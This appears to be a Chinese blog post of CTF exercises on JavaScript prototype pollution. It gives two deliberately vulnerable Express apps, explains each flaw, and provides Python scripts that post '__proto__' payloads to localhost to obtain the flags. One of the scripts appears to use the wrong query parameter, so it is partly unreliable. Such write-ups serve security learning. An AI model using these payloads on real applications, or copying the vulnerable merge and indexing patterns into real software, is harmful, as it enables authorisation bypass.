原型链污染例题

最新推荐文章于 2024-09-11 15:33:18 发布
最新推荐文章于 2024-09-11 15:33:18 发布
阅读量47 收藏
点赞数
文章标签: javascript 前端 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gchoud/article/details/132095120
版权

第一题

const express = require('express')
var hbs = require('hbs');
var bodyParser = require('body-parser');
const md5 = require('md5');
var morganBody = require('morgan-body');
const app = express();
var user = []; //empty for now

var matrix = [];
for (var i = 0; i < 3; i++){
    matrix[i] = [null , null, null];
}
function draw(mat) {
    var count = 0;
    for (var i = 0; i < 3; i++){
        for (var j = 0; j < 3; j++){
            if (matrix[i][j] !== null){
                count += 1;
            }
        }
    }
    return count === 9;
}

app.use(express.static('public'));
app.use(bodyParser.json());
app.set('view engine', 'html');
morganBody(app);
app.engine('html', require('hbs').__express);

app.get('/', (req, res) => {

    for (var i = 0; i < 3; i++){
        matrix[i] = [null , null, null];

    }
    res.render('index');
})


app.get('/admin', (req, res) => { 
    /*this is under development I guess ??*/
    console.log(user.admintoken);
    if(user.admintoken && req.query.querytoken && md5(user.admintoken) === req.query.querytoken){
        res.send('Hey admin your flag is <b>flag{prototype_pollution_is_very_dangerous}</b>');
    } 
    else {
        res.status(403).send('Forbidden');
    }    
}
)


app.post('/api', (req, res) => {
    var client = req.body;
    var winner = null;

    if (client.row > 3 || client.col > 3){
        client.row %= 3;
        client.col %= 3;
    }
    matrix[client.row][client.col] = client.data;
    // matrix[__proto__][admintoken] = 123456;
    for(var i = 0; i < 3; i++){
        if (matrix[i][0] === matrix[i][1] && matrix[i][1] === matrix[i][2] ){
            if (matrix[i][0] === 'X') {
                winner = 1;
            }
            else if(matrix[i][0] === 'O') {
                winner = 2;
            }
        }
        if (matrix[0][i] === matrix[1][i] && matrix[1][i] === matrix[2][i]){
            if (matrix[0][i] === 'X') {
                winner = 1;
            }
            else if(matrix[0][i] === 'O') {
                winner = 2;
            }
        }
    }

    if (matrix[0][0] === matrix[1][1] && matrix[1][1] === matrix[2][2] && matrix[0][0] === 'X'){
        winner = 1;
    }
    if (matrix[0][0] === matrix[1][1] && matrix[1][1] === matrix[2][2] && matrix[0][0] === 'O'){
        winner = 2;
    } 

    if (matrix[0][2] === matrix[1][1] && matrix[1][1] === matrix[2][0] && matrix[2][0] === 'X'){
        winner = 1;
    }
    if (matrix[0][2] === matrix[1][1] && matrix[1][1] === matrix[2][0] && matrix[2][0] === 'O'){
        winner = 2;
    }

    if (draw(matrix) && winner === null){
        res.send(JSON.stringify({winner: 0}))
    }
    else if (winner !== null) {
        res.send(JSON.stringify({winner: winner}))
    }
    else {
        res.send(JSON.stringify({winner: -1}))
    }

})
app.listen(3000, () => {
    console.log('app listening on port 3000!')
})

解析:

重点关注这段代码

matrix[client.row][client.col] = client.data;

可把它变为如下代码,就可成功

matrix[__proto__][admintoken] = 123456;

这段代码表示matrix.__proto__.admintoken=123456,因为matrix和user都是一个数组,matrix的原型链上加上了属性admintoken=123456,那么user的原型链上也就有这个admintoken=123456的属性。

payload:

import requests
import json
url1 = "http://127.0.0.1:3000/api"
url2 = "http://127.0.0.1:3000/admin?admintoken=E10ADC3949BA59ABBE56E057F20F883E"
s = requests.session()
headers = {"Content-Type":"application/json"}
data1 = {"row":"__proto__","col":"admintoken","data":"123456"}
res1 = s.post(url1, headers=headers, data=json.dumps(data1))
res2 = s.get(url2)
print(res2.content)

第二题

'use strict';

const express = require('express');
const bodyParser = require('body-parser')
const cookieParser = require('cookie-parser');
const path = require('path');


const isObject = obj => obj && obj.constructor && obj.constructor === Object;

function merge(a, b) {
    for (var attr in b) {
        if (isObject(a[attr]) && isObject(b[attr])) {
            merge(a[attr], b[attr]);
        } else {
            a[attr] = b[attr];
        }
    }
    return a
}

function clone(a) {
    return merge({}, a);
}

// Constants
const PORT = 3000;
const HOST = '127.0.0.1';
const admin = {};

// App
const app = express();
app.use(bodyParser.json())
app.use(cookieParser());

app.use('/', express.static(path.join(__dirname, 'views')));
app.post('/signup', (req, res) => {
    var body = JSON.parse(JSON.stringify(req.body)); 
    var copybody = clone(body)
    if (copybody.name) {
        res.cookie('name', copybody.name).json({
            "done": "cookie set"
        });
    } else {
        res.json({
            "error": "cookie not set"
        })
    }
});
app.get('/getFlag', (req, res) => {
    var аdmin = JSON.parse(JSON.stringify(req.cookies))
    if (admin.аdmin == 1) {
        res.send("hackim19{}");
    } else {
        res.send("You are not authorized");
    }
});
app.listen(PORT, HOST);
console.log(`Running on http://${HOST}:${PORT}`);

解析:

思路:利用merge函数,让admin这个对象的原型链上加上一个属性admin=1.

function merge(a, b) {
    for (var attr in b) {
        if (isObject(a[attr]) && isObject(b[attr])) {
            merge(a[attr], b[attr]);
        } else {
            a[attr] = b[attr];
        }
    }
    return a
}

payload:

import requests
import json
url1 = "http://127.0.0.1:3000/signup"
url2 = "http://127.0.0.1:3000/getFlag"
s = requests.session()
headers = {"Content-Type":"application/json"}
data1 = {"__proto__":{"аdmin":1}}
res1 = s.post(url1, headers=headers, data=json.dumps(data1))
res2 = s.get(url2)
print(res2.content)

gchoud
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
原型链污染例题复现
weixin_57549548的博客
08-04 679
在mess.js中我们声明了一个数组secret,然后该数组调用了属于的foreach方法,如下但是,在调用js文件之前,js代码中将方法进行了重写,而prototype链为,secret中无 foreach 方法,所以就会向上检索,就找到了而其foreach方法已经被重写过了,所以会执行输出。这就是原型链污染。在我们想要利用的代码之前的赋值语句如果可控的话,我们进行 ——__proto__ 赋值,之后就可以利用代码了。
JavaScript另外一道原型链污染例题
banliyaoguai的博客
08-23 470
然后我们尝试传入一个数值(传入如下面代码),触发clone然后触发merge,尝试进行一个原型链污染,但是测试结果是无法进行污染,admin这个对象还是未定义,原因是在我们在创建字典的时候已经作为__proto__给test赋值了,所以test.__proto__中是有admin属性了。那么我们如何达到我们的目的,那就想办法让__proto__被认为是一个键名,我们可以使用下面代码,我们在下面子代码中使用JSON.parse解析代码,这样在下面代码中__proto__就会被认为是一个键名。
Nodejs原型链污染
apple_74953689的博客
07-28 273
在攻防世界和CTF比赛中见过几道Nodejs原型链污染的题目,发现这是一个常考点,不得不整理了。首先解释一下原型链
一道简单的JavaScript原型链污染例题:hackit 2018
banliyaoguai的博客
08-20 782
任何对象都有prototype属性,这个属性就是实例对象的原型对象,然后原型对象上如果添加一个属性,所有实例都会共享这个属性。比如object的tostring方法。这个原型对象的属性绑定在构造函数上,且当实例对象有某个属性或方法就不会再去原型对象找这个方法或属性。然后__proto__可以指向当前对象的原型对象。我们对__proto__赋值就可以修改原型对象的值。
nodejs——原型链污染
m0_73756016的博客
06-12 1002
参考滑动验证页面。
复现原型链污染
weixin_64623293的博客
08-07 328
是一个类的属性,所有类对象在实例化的时候将会拥有prototype中的属性和方法2.一个对象的__proto__属性,指向这个对象所在的类的prototype属性对于对象son,在调用。
js原型链污染
m0_73973498的博客
11-13 86
需要纠正的是,o2和o1对象的层级本身是没有__proto__属性的,只有__prototype__,我们平常通过.__proto__调用都是向上寻找到Object.prototype,调用其中的__proto__属性,因为__proto__属性通过Getter动态获取__proto__的值的,所以不同层级的对象调用Object.prototype中的__proto__属性得到的值是不同的。这是merge函数造成的原型链污染,类似的还有clone函数,本质是找到能够控制数组(对象)的“键名”的操作。
JavaScript 原型链污染
十一.的博客
10-24 181
2.对象clone(其实内核就是将待操作的对象merge到一个空对象中)我们思考一下,哪些情况下我们可以设置。
记录js原型链污染
RuiLike的博客
05-17 248
对象.proto=构造器(构造函数).prototype构造器.prototype其实也是一个对象,为构造函数的原型对象,同样有__proto__属性,一直通过原型链__proto__最终可找到null。我们可以通过Foo.prototype来访问Foo类的原型,但Foo实例化出来的对象,是不能通过prototype访问原型的。这时候,就该__proto__登场了。
JavaScript应用程序经典实例配套例题
07-12
3. **对象与原型链**:了解JavaScript的对象创建方式,原型和原型链的工作原理,以及如何使用构造函数和类来创建复杂的数据结构。 4. **DOM操作**:学习如何通过JavaScript操作文档对象模型(DOM),添加、删除和...
JS部分学习笔记
qq_35260061的博客
04-28 1101
JavaScript ECMAScript NaN不等于任何东西,包括自己。 JS数据类型 (原始值和引用值)其中原始值包括:number, string, boolean, undefined, null,引用值包括:array, object, function 逻辑运算符:&& || ! 1、&&(与):先看第一表达式转换成布尔值的结果,如果结果为真,那么会看第二个表达式转换为布尔值的结果,然后如果两个表达式的化,只看到第二个表达式,就可以返回该表达式的值了。以此
JavaScript + ES6】前端八股文面试题
Una的博客
08-27 1395
提供的方法仅供参考哈,有更好的想法,可以评论交流。 持续更新当中...
继承模式,命名空间,对象枚举
weixin_44270940的博客
02-20 133
/*继承模式,命名空间,对象枚举(上)*/ /*继承的发展史*/ /* 1.传统形式 --&gt; 原型链 过多的继承了太多没有用的属性 2.借用构造函数 不能继承借用构造函数的原型 每次构造函数都要多走一个函数 3.共享原型 ...
软件著作权申请教程(超详细)(2024新版)软著申请
m0_75269526的博客
09-09 2012
软件著作权,软著,软著申请,软用户使用手册:提交登记软件的任何一种文档的连续的前30页和连续的后30页,每页不少于30行。如果是多人合作开发著作权人不是一个人的话,还需要准备一份合作开发协议。首先我们需要在官网里面注册一个账号,并且完成实名认证,一般是注册【个人】的身份。合作开发协议书:这个如果是著作权人有多个(多个人一起开发)就需要提供这个材料。在填报完成之后需要打印一个签章页签字(如果不是个人需要盖章)注册完成后点击下面进行登记,如果没有实名需要先实名认证(源代码:源程序前连续的30页和后连续的30页。
js中【Worker】相关知识点详细解读
最新发布
2301_79858914的博客
09-11 445
JavaScript 中的 Worker 是一个可以在后台线程中运行代码的 API,这样可以避免主线程(通常是 UI 线程)被阻塞。使用 Worker 时,JavaScript 可以在多线程环境中工作,解决了单线程的瓶颈问题。通常情况下,JavaScript 是单线程的,也就是所有的代码(包括 DOM 操作和事件处理等)都在同一个线程里执行。如果某段代码需要大量计算,或者运行时间过长,会阻塞整个页面,导致界面卡顿甚至崩溃。Worker提供了一种将复杂或耗时的任务分配到后台线程执行的方法。
界面控件KendoReact中文教程 - 如何创建动态进度条?
需要界面开发、IDE工具研发中文教程资料的小伙伴,记得私信我~
09-06 1376
本文主要介绍如何使用KendoReact ProgressBar和ChunkProgressBar组件在React应用程序中创建动态进度条,欢迎下载新版控件体验!
Module “console“ has been externalized for browser compatibility.
Alvin的博客
09-07 266
在 Vue 3.5.3 中使用 Vite 作为构建工具时,如果你尝试直接从。模块外部化了,这意味着它不会在客户端环境中暴露。去除导入 error 函数的代码。函数,会遇到一个错误,提示。这是因为 Vite 默认将。Vue 3.5.3 中。
echarts.js+china.js实现中国地图各省数据案例
qq_58258855的博客
09-11 287
实现中国地图各省数据案例
马尔科夫链matlab例题
08-18
马尔可夫链(Markov Chain)是一种数学模型,用于描述一个随机系统随时间变化的概率过程。在MATLAB中,我们可以使用`markovchain`函数来创建和操作马尔可夫链,并通过`simulate`函数来进行模拟。 例如,假设我们要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值